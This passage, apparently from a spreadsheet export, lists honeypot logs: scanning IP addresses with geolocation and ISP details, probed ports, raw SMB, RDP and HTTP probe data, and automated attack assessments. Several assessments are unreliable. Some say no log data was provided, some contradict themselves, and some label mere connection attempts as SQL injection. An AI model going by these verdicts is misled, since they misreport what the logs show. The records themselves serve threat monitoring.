(103.30.65.187,47126)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,16133)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,16204)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,63560)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,64066)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,17201)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59418)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59451)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.187,59947)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:671e:41bb</t>
  </si>
  <si>
    <t>Data indicates an attempt to exploit or scan for vulnerabilities related to Microsoft SQL Server, suggesting a potential malicious activity such as database enumeration or unauthorized access attempt was made. No actual data was retrieved which could indicate the perpetrator was unable to gain access or retrieve information. This type of activity is often used by attackers to gather sensitive data or gain control over databases.</t>
  </si>
  <si>
    <t>e217c358d9f0f0d482791f3efaaa6701</t>
  </si>
  <si>
    <t>59.182.148.159</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>48443&amp;&amp;23</t>
  </si>
  <si>
    <t>Nedumangād</t>
  </si>
  <si>
    <t>1261553</t>
  </si>
  <si>
    <t>8.60267</t>
  </si>
  <si>
    <t>77.0014</t>
  </si>
  <si>
    <t>::ffff:3bb6:949f</t>
  </si>
  <si>
    <t>No TELNET activity detected.</t>
  </si>
  <si>
    <t>2f5f3d84c386cfa6d081147f709c73bf</t>
  </si>
  <si>
    <t>49.248.15.234</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>22&amp;&amp;45941&amp;&amp;1433&amp;&amp;38268&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Tata Teleservices (Maharashtra) Limited</t>
  </si>
  <si>
    <t>2010-10-08</t>
  </si>
  <si>
    <t>HTIL-TTML-IN</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (49.248.15.234,59667)}&amp;&amp;{Data_SMB:Incoming connection (49.248.15.234,60176)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:31f8:fea</t>
  </si>
  <si>
    <t>An attempt was made to access Microsoft SQL database without authentication or credentials provided. This could be a brute-force attack to gain unauthorized access. The attackers are trying to exploit the lack of password protection for the SQL database.</t>
  </si>
  <si>
    <t>85b4e9b1b0434f1313e15f2bf6b0b3d9</t>
  </si>
  <si>
    <t>117.221.223.172</t>
  </si>
  <si>
    <t>::ffff:75dd:dfac</t>
  </si>
  <si>
    <t>This log suggests an attempt to connect to a telnet service, possibly by an attacker trying to gain unauthorized access or conduct reconnaissance on the system.
The activity may be related to remote exploitation or scanning for vulnerabilities.
This is likely an external probing or scanning activity. &amp;&amp; This indicates a failed attempt to connect or login to a telnet service, possibly due to incorrect credentials or an invalid request. The log does not contain any further information about the nature of the attempt. This suggests a potential probing activity for vulnerabilities in the system's telnet configuration.</t>
  </si>
  <si>
    <t>bb5413198455b7aa540d692e8a022fc6</t>
  </si>
  <si>
    <t>125.235.235.209</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'spambot.bls.digibase.ca': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>Quảng Ninh</t>
  </si>
  <si>
    <t>Thành Phố Uông Bí</t>
  </si>
  <si>
    <t>1563241</t>
  </si>
  <si>
    <t>21.0343</t>
  </si>
  <si>
    <t>106.77</t>
  </si>
  <si>
    <t>xDSL Services</t>
  </si>
  <si>
    <t>2005-10-25</t>
  </si>
  <si>
    <t>::ffff:7deb:ebd1</t>
  </si>
  <si>
    <t>The system is detecting an attempt to connect to Microsoft SQL Server. This suggests a potential brute-force login or password cracking attempt. The lack of specific username or IP address makes it difficult to pinpoint the source. &amp;&amp; This indicates an attempt to access or exploit a Microsoft SQL server, potentially for unauthorized database access or injection.
The user is likely trying to gain unauthorized access to the database using a vulnerability in the system.
Malicious activity detected.</t>
  </si>
  <si>
    <t>SQL Inject &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>f289198d0675122fbcb45b93e2677f9c</t>
  </si>
  <si>
    <t>120.57.121.155</t>
  </si>
  <si>
    <t>::ffff:7839:799b</t>
  </si>
  <si>
    <t>No malicious activity detected as TELNET service is not used by attackers in this log entry. This indicates that no attempts were made to access the telnet service. The telnet service remains inactive. &amp;&amp; Unknown TELNET login attempt with no further details available. No credentials or IP address provided, making it difficult to assess severity. May indicate reconnaissance activity.</t>
  </si>
  <si>
    <t>c4a2556ec86bc16725f59f957d3ade4f</t>
  </si>
  <si>
    <t>125.16.91.170</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;5859&amp;&amp;1433</t>
  </si>
  <si>
    <t>Obeetee Private Limited</t>
  </si>
  <si>
    <t>2005-08-03</t>
  </si>
  <si>
    <t>OEET-4178684-MIRZAPUR</t>
  </si>
  <si>
    <t>::ffff:7d10:5baa</t>
  </si>
  <si>
    <t>This indicates an attempt to access the Microsoft SQL Server database, likely for malicious purposes such as stealing sensitive data or exploiting vulnerabilities. The lack of a response suggests the attacker was attempting to connect anonymously. An empty Data_MSSQL field may indicate a scanning activity rather than a genuine login attempt.</t>
  </si>
  <si>
    <t>a7c80a82a37d6444f990454a575a6ccd</t>
  </si>
  <si>
    <t>103.76.172.11</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTP_H33&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_SMB_H1&amp;&amp;SMA-LAB_NTP_H46&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;9100&amp;&amp;80&amp;&amp;443&amp;&amp;631&amp;&amp;22&amp;&amp;445&amp;&amp;123&amp;&amp;5900&amp;&amp;30524&amp;&amp;1433</t>
  </si>
  <si>
    <t>Kota Depok</t>
  </si>
  <si>
    <t>Gandul</t>
  </si>
  <si>
    <t>1644491</t>
  </si>
  <si>
    <t>-6.34212</t>
  </si>
  <si>
    <t>106.787</t>
  </si>
  <si>
    <t>9341</t>
  </si>
  <si>
    <t>PT Indonesia Comnets Plus</t>
  </si>
  <si>
    <t>ICONPLN</t>
  </si>
  <si>
    <t>2016-10-06</t>
  </si>
  <si>
    <t>ICONPLN-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,60786)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,61152)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,52664)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,53069)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,49482)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,49947)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55577)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55972)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55183)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55591)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,55619)}&amp;&amp;{Data_SMB:Incoming connection (103.76.172.11,50308)}</t>
  </si>
  <si>
    <t>::ffff:674c:ac0b</t>
  </si>
  <si>
    <t>A potential malicious SMB connection attempt from an unknown IP address. The IP address 103.76.172.11 is attempting to establish a connection to the system's shared resources. This could be indicative of a brute force attack or unauthorized access attempt. &amp;&amp; Malicious activity detected: an unknown computer is attempting to establish a connection to a shared resource from the monitored system with IP address 103.76.172.11. The connection is coming from port 50308 on this remote system. This could be a potential attack attempt through a service.</t>
  </si>
  <si>
    <t>f6f3fe9f73e454d33ac9d17375eb8eee</t>
  </si>
  <si>
    <t>103.230.102.177</t>
  </si>
  <si>
    <t>Kolkata (Kailas Nagar)</t>
  </si>
  <si>
    <t>22.7124</t>
  </si>
  <si>
    <t>88.4741</t>
  </si>
  <si>
    <t>133240</t>
  </si>
  <si>
    <t>WAVETREE NETWORKS PVT LTD</t>
  </si>
  <si>
    <t>Wavetree Networks PVT LTD</t>
  </si>
  <si>
    <t>2014-04-30</t>
  </si>
  <si>
    <t>WAVETREE1</t>
  </si>
  <si>
    <t>::ffff:67e6:66b1</t>
  </si>
  <si>
    <t>Possible brute force attack attempt on MySQL database login credentials, indicating malicious actor trying to access sensitive information through invalid or guessed login attempts with no success yet. &amp;&amp; Possible brute force attempt against MySQL service, as there is no login activity but still a connection attempt was made. This could indicate an automated script trying to gain unauthorized access. No actual database interaction occurred.</t>
  </si>
  <si>
    <t>SQL Injection &amp;&amp; MySQL Attack</t>
  </si>
  <si>
    <t>3214e35a2b5065539d44a579d8ff483d</t>
  </si>
  <si>
    <t>103.160.49.110</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;63360</t>
  </si>
  <si>
    <t>::ffff:67a0:316e</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. &amp;&amp; No log data provided, therefore, no analysis can be made. &amp;&amp; No log data provided, unable to analyze potential malicious activity. &amp;&amp; The data suggests attempted brute-force login attempts, indicating unauthorized access attempts to the server. This activity may be part of a larger phishing or malware attack campaign. The attackers are likely using automated scripts to try various combinations of usernames and passwords.</t>
  </si>
  <si>
    <t>I need some actual log data to analyze! Please provide the log data, and I'll do my best to identify the type of attack. &amp;&amp; I'd be happy to help analyze the log data, but it appears that there is no log data provided. Please provide the actual log data and I will assist in identifying the type of attack. &amp;&amp; There is no log data provided to analyze. Please provide the log data for me to identify the types of attacks.</t>
  </si>
  <si>
    <t>05a6d7cdadc71e9f912f2d5291c1516d</t>
  </si>
  <si>
    <t>103.241.81.94</t>
  </si>
  <si>
    <t>Pune</t>
  </si>
  <si>
    <t>Pimpri-Chinchwad (Kalewadi Phata)</t>
  </si>
  <si>
    <t>7626690</t>
  </si>
  <si>
    <t>18.6347</t>
  </si>
  <si>
    <t>73.8195</t>
  </si>
  <si>
    <t>132770</t>
  </si>
  <si>
    <t>Gazon Communications India Limited</t>
  </si>
  <si>
    <t>Abilitynetworks</t>
  </si>
  <si>
    <t>2015-12-11</t>
  </si>
  <si>
    <t>ABILITYNETWORKS</t>
  </si>
  <si>
    <t>::ffff:67f1:515e</t>
  </si>
  <si>
    <t>e3482268388cb8941a3c308ea91d6592</t>
  </si>
  <si>
    <t>182.71.72.20</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H17</t>
  </si>
  <si>
    <t>Dewas</t>
  </si>
  <si>
    <t>1273066</t>
  </si>
  <si>
    <t>455001</t>
  </si>
  <si>
    <t>22.9676</t>
  </si>
  <si>
    <t>76.0534</t>
  </si>
  <si>
    <t>IGEE-3186116-Dewas</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62650)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,61378)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62221)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,61702)}&amp;&amp;{Data_SMB:Incoming connection (182.71.72.20,62311)}</t>
  </si>
  <si>
    <t>::ffff:b647:4814</t>
  </si>
  <si>
    <t>Possible malicious activity involves an incoming suspicious SMB connection from an IP address attempting to establish unauthorized access or potentially spread malware. This could be part of a larger attack attempt on the network. Further analysis is needed to determine intent and severity. &amp;&amp; An incoming connection from an unknown IP address is attempting to access shared resources on the network. This could be a potential attempt at unauthorized file sharing or data theft. The user's intentions may not be legitimate. &amp;&amp; The data indicates an incoming SMB connection attempt from IP address 182.71.72.20 to the monitored system's shared resources. This could be a potential attack vector for malware or unauthorized data access. The source may be attempting to exploit vulnerabilities in the SMB service. &amp;&amp; A potential SMB client attempt to connect from IP 182.71.72.20, indicating possible malicious activity such as brute force login attempts or unauthorized access attempts. This could be a scan for vulnerable systems or exploitation of open shares. The intention may be to gain unauthorized access or spread malware.</t>
  </si>
  <si>
    <t>ce5f342bbb01b0cb05e2e3b7d912d671</t>
  </si>
  <si>
    <t>59.182.115.214</t>
  </si>
  <si>
    <t>::ffff:3bb6:73d6</t>
  </si>
  <si>
    <t>b8303a1e9e82ee573566270c2a82a222</t>
  </si>
  <si>
    <t>125.17.181.218</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>OEET-3646474-GOPIGANJ</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49825)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,29388)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,64603)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,40621)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,11964)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,20082)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,10561)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,16534)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,14893)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,61824)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49767)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49598)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49895)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,12219)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,58188)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,54716)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,45630)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,61430)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,8498)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,12016)}</t>
  </si>
  <si>
    <t>::ffff:7d11:b5da</t>
  </si>
  <si>
    <t>The system is being probed for potential Microsoft SQL Server vulnerabilities, possibly as part of a reconnaissance or scanning activity to identify exploitable weaknesses. This could be an initial step by attackers before launching a more severe attack. The intention appears to be gathering information on the server's configuration and security posture.</t>
  </si>
  <si>
    <t>208be924fe58ff629829c7a8a93dd101</t>
  </si>
  <si>
    <t>45.125.236.84</t>
  </si>
  <si>
    <t>140832</t>
  </si>
  <si>
    <t>Vietnam F Tech., JSC</t>
  </si>
  <si>
    <t>FTECH</t>
  </si>
  <si>
    <t>::ffff:2d7d:ec54</t>
  </si>
  <si>
    <t>a1346d7b5b59ba0a057255cae24f397f</t>
  </si>
  <si>
    <t>117.223.39.38</t>
  </si>
  <si>
    <t>::ffff:75df:2726</t>
  </si>
  <si>
    <t>Attempt to connect to TELNET service, likely a port scan or reconnaissance activity.
TELNET is an outdated protocol that should be closed to incoming traffic unless explicitly needed.
This could indicate a potential vulnerability or unpatched system. &amp;&amp; No TELNET activity detected, indicating a potential evasion tactic by an attacker to avoid detection. 
TELNET is a common service targeted by attackers for unauthorized access. 
No attempts made to use the TELNET service in this instance.</t>
  </si>
  <si>
    <t>Telnet Attack &amp;&amp; Brute Force</t>
  </si>
  <si>
    <t>e163dfcaf5e095f6fd28209972798dfd</t>
  </si>
  <si>
    <t>194.187.176.182</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_NTP_H44</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;443&amp;&amp;3389&amp;&amp;5900&amp;&amp;32838&amp;&amp;143</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.182.38.84', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=user'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;NA&amp;&amp;{Data_IMAP:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b0b6</t>
  </si>
  <si>
    <t>42634bbe2c8850e2051ea16f9c2dbedd</t>
  </si>
  <si>
    <t>27.34.244.115</t>
  </si>
  <si>
    <t>Bengaluru (Devinagar)</t>
  </si>
  <si>
    <t>13.0508</t>
  </si>
  <si>
    <t>77.5709</t>
  </si>
  <si>
    <t>45648</t>
  </si>
  <si>
    <t>Bell Teleservices India Pvt Ltd</t>
  </si>
  <si>
    <t>GopalanCollege WAN</t>
  </si>
  <si>
    <t>2010-04-08</t>
  </si>
  <si>
    <t>GopalanCollege-WAN</t>
  </si>
  <si>
    <t>::ffff:1b22:f473</t>
  </si>
  <si>
    <t>c034792fd3411fba5f0eb953dc204696</t>
  </si>
  <si>
    <t>120.60.98.100</t>
  </si>
  <si>
    <t>::ffff:783c:6264</t>
  </si>
  <si>
    <t>40fbd372d4deec54847983cfdf76dd65</t>
  </si>
  <si>
    <t>103.166.57.104</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;53904&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>Sydney</t>
  </si>
  <si>
    <t>2147714</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>-33.8662</t>
  </si>
  <si>
    <t>151.205</t>
  </si>
  <si>
    <t>55581</t>
  </si>
  <si>
    <t>BINARY NETWORKS PTY LTD</t>
  </si>
  <si>
    <t>Binary Networks PTY LTD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:67a6:3968</t>
  </si>
  <si>
    <t>7ff1427505fe7722ce08afeed99aa5e0</t>
  </si>
  <si>
    <t>161.132.55.74</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>::ffff:a184:374a</t>
  </si>
  <si>
    <t>The attacker is scanning and probing various services to gather information about the system, potentially for future attacks. They are trying to identify vulnerabilities and open ports on the network. &amp;&amp; The attacker is probing various services and protocols to identify vulnerabilities or gain unauthorized access. They are sending requests with suspicious credentials, attempting to exploit authentication weaknesses and potentially gaining control over systems. The attacker's goal appears to be reconnaissance and exploitation of security loopholes.</t>
  </si>
  <si>
    <t>Port Scan Attack &amp;&amp;  Port Scanning</t>
  </si>
  <si>
    <t>7203de141e6de1b93e7889af2be36d29</t>
  </si>
  <si>
    <t>183.88.212.69</t>
  </si>
  <si>
    <t>NA&amp;&amp;mx-ll-183.88.212-69.dynamic.3bb.co.th</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IRC_H42&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>23&amp;&amp;6667&amp;&amp;9100&amp;&amp;443&amp;&amp;161&amp;&amp;389&amp;&amp;3403</t>
  </si>
  <si>
    <t>20</t>
  </si>
  <si>
    <t>Chon Buri</t>
  </si>
  <si>
    <t>Bang Lamung</t>
  </si>
  <si>
    <t>Pattaya</t>
  </si>
  <si>
    <t>1614295</t>
  </si>
  <si>
    <t>12.9333</t>
  </si>
  <si>
    <t>100.883</t>
  </si>
  <si>
    <t>::ffff:b758:d445</t>
  </si>
  <si>
    <t>1151ae45b817bf230dd442d94d5de2b6</t>
  </si>
  <si>
    <t>185.180.140.5</t>
  </si>
  <si>
    <t>ca-san-us-gd17-wk102.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;8443&amp;&amp;22256&amp;&amp;17463&amp;&amp;48347&amp;&amp;NA&amp;&amp;3389</t>
  </si>
  <si>
